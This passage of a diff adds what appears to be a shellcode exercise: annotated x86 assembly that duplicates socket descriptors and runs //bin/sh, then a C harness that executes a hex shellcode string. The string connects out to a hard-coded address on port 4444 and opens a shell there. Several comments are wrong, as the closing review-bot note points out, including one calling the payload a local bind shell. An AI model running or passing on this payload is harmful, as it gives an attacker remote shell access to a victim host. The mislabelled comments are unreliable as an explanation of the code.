+; | uneeded | | 0x03 | | *address to struct | | socketid |
+; \------------/ \---------/ \---------------------/ \---------/
+
+
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+; C version : int dup2(clientid, localDiscripToDuplicate);
+; ASM version: standard syscall using same format as above
+; -----
+; Param Values:
+; clientid // currently stored in eax
+;
+; localDiscripToDuplicate // 0, 1, 2 file descriptors to duplicate
+; -----
+; Registers before calling dup2:
+;
+; /---eax---\ /---ebx----\ /-------------ecx---------------\
+; | 0x3f | | sockid | | file descriptor to dplicate |
+; \---------/ \----------/ | 2, 1 adnd 0 |
+; \-------------------------------/
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+
+
+mov ebx, esi ; moving socketid from eax to ebx
+
+ ; now we need a loop to run through for
+ ; 0, 1 and 2
+
+xor ecx, ecx ; zeroing out ecx
+mov cl, 0x03 ; moving syscall for dup2
+
+dupin:
+ xor eax, eax ; zeroing out eax
+ mov al, 0x3f ; setting syscall value for dup2
+ dec cl ; decreasing loop counter since we
+ ; will need to deal with only 2, 1 and 0
+ int 0x80 ; syscall triggering listen
+ jnz dupin ; if the zero flag is not set then do it again
+
+; registers after calling socktcall
+;
+; since we don't care about any return values
+; we don't bother tracking register values
+
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+; C version : int execve(const char *filename, char *const argv[], char *const envp[]);
+; ASM version: standard syscall using same format as above
+; -----
+; Param Values:
+; filename // path of elf32 to execute
+;
+; argv // standard argv, first param is full path to elf32 null terminated
+;
+; envp // any environmental specific things, null in our case
+; -----
+; Registers before calling execve:
+;
+; /---eax---\ /----------------ebx--------------------\ /-------------ecx---------------\
+; | 0x0B | | stack address if //bin/sh,0x00000000 | | stack address to 0x00000000 |
+; \---------/ \---------------------------------------/ \-------------------------------/
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+
+; call execve in order to complete the local bind shell
+; execve("/bin/sh", argv[], envp[]);
+; argv needs to be Address of /bin/sh, 0x00000000
+; this is because when you call something from bash, etc
+; argv will contain the path of the executable within it
+
+; before starting we look like:
+; execve(NOT-SET-YET, NOT-SET-YET, NOT-SET-YET)
+
+; First we need to get 0x00000000 into ebx somehow
+; so lets zero out eax and push it to esp
+
+xor eax, eax ; zeroing out eax to make it 0x00000000
+push eax ; pushing 0x00000000 onto the stack (esp)
+
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+; esp now looks like: 0x00000000;
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+
+; pushing "//bin/sh" (8 bytes and reverses due to little endian)
+push 0x68732f6e ; hs/n : 2f68732f into esp
+push 0x69622f2f ; ib// : 6e69622f into esp
+
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+;esp now looks like: "//bin/sh,0x00000000";
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+
+; since we have been pushing to the stack, we have been pushing to esp
+; now we need to get "//bin/sh,0x00000000" into ebx since it is the first parameter for execve
+; since esp contains exactly what we need we move it to ebx
+
+mov ebx, esp ; moving the param to ebx
+ ; ebx now contains "//bin/sh,0x00000000"
+
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+; now we look like: execve("//bin/sh,0x00000000", NOT-SET-YET, NOT-SET-YET);
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+
+; now we need to get 0x00000000 into edx
+push eax ; eax is still 0x00000000 so push it to esp
+mov edx, esp ; we need to move a 0x00000000 into
+ ; the third parameter in edx
+
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+; now we look like: execve("//bin/sh,0x00000000", NOT-SET-YET, 0x00000000);
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+
+; the second parameter is needs to be "//bin/sh,0x00000000"
+; which we can accomplish by moving ebx onto the stack
+; and then moving esp into ecx since it will be on the stack
+
+push ebx ; pushing "//bin/sh,0x00000000" back to the stack
+mov ecx, esp ; moving the address of ebx (on the stack) to ecx
+
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+; now we look like: execve("//bin/sh,0x00000000", *"//bin/sh,0x00000000", 0x00000000);
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+
+; loading syscall execve
+mov al, 0x0B ; syscall for execve is 11 dec / 0x0B hex
+int 0x80
+
+*/
+
+#include
+#include
+
+//compile with: gcc shellcode.c -o shellcode -fno-stack-protector -z execstack
+
+unsigned char code[] = \
+"\x31\xc0\x50\x6a\x01\x6a\x02\x89\xe1\x31\xc0\xb0\x66\x31\xdb\xb3\x01\xcd\x80\x96\x31\xd2\x52\xc6\x04\x24\x0a\xc6\x44\x24\x02\x07\xc6\x44\x24\x03\x11\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\x89\xe1\x43\x43\x31\xc0\xb0\x66\xcd\x80\x89\xf3\x31\xc9\xb1\x03\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\x75\xf6\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
+
+main()
+{
+ printf("Shellcode Length: %d\n", strlen(code));
+ int (*ret)() = (int(*)())code;
+ ret();
+}
\ No newline at end of file
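Review bot: Several embedded assembly comments contradict the instruction they annotate: `xor eax, eax ; zeroing out edx to set IPPROTO_IP to 0` zeroes eax, `mov ebx, esi ; moving socketid from eax to ebx` reads esi, the `int 0x80` inside `dupin` is annotated `syscall triggering listen` although `al` holds the dup2 number, and the `push 0x68732f6e` / `push 0x69622f2f` comments give hex values (`2f68732f`, `6e69622f`) that are not the pushed immediates. Suggested corrections: `xor eax, eax ; zero eax (IPPROTO_IP = 0)`, `mov ebx, esi ; socket fd from esi into ebx`, `int 0x80 ; dup2 syscall`. In the C harness, `main()` has no return type, the two `#include` lines name no header, and `strlen` is printed with `%d` rather than `%zu`; `int main(void)` with `<stdio.h>` and `<string.h>` would make it build cleanly with the command documented in the comment.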